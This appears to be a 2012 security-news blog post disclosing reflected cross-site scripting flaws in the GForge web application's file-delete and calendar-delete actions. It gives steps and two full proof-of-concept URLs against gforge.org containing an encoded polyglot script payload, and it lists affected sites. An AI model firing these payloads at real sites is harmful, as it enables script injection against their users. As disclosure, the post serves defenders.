Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Home XSS in Gforge App ; Joomlacode.org, Stanford.edu,lbl.gov,etc.affected
Breaking News Vulnerability Web Application Vulnerability XSS Vulnerability

XSS in Gforge App ; Joomlacode.org, Stanford.edu,lbl.gov,etc.affected

Monday, January 30, 2012

Hacker "Sony" discovered Cross site scripting vulnerability in the GForge web Application.  GForge is a free software fork of the web-based project-management and collaboration software originally created for SourceForge, called Savane. GForge provides project hosting, version control (CVS and Subversion), bug-tracking, and messaging.

Hacker made two accounts for testing and discovered XSS in the files,calendar,messagewall (search users), blogs..


The Vulnerability Description:
XSS using Files:
After creating fake account, upload your file.

It will available in this location:
http://gforge.org/gf/user/eleo/userfiles/

And press button delete and open link in the new window and add in the url our xss.

http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089[our xss is here]

Poc:
http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E


XSS in Calendar:

Open calendar and press button "add new event" and press button delete and open link in the new window and add in the url our xss.

http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600[our xss is here]

Poc:
http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E


The vulnerability affects the following sites: Joomlacode.org,Stanford.edu,lbl.gov,umich.edu, and other sites that using Gforge app.

Tags: Breaking News Vulnerability Web Application Vulnerability XSS Vulnerability
Share it:

Breaking News

Vulnerability

Web Application Vulnerability

XSS Vulnerability